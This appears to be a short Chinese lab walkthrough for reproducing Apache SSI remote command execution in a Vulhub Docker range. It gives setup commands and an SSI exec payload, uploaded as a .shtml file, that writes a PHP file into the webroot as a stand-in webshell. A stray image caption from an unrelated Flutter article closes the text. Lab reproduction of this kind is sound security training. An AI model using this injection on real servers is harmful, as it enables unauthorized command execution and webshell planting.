Apache SSI 远程命令执行漏洞
1.cd到ssi-rce
cd /opt/vulhub/httpd/ssi-rce/
2.执行docker-compose up -d
docker-compose up -d
3.查看靶场是否开启成功
dooker ps
拉取成功了
4.访问url
这里已经执行成功了,注意这里需要加入/upload.php
5.写入一句话木马
<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->
6.提交查询
7.点击shell.shtml
8.查看是否写入成功
docker exec -it ssi-rce_apache_1 /bin/bash
9.获取phpinfo
![[Flutter] extends、implements、mixin和 abstract、extension的使用介绍说明](https://img-blog.csdnimg.cn/direct/ad1ffa9f8dc84b44908e1018be08a57d.png)
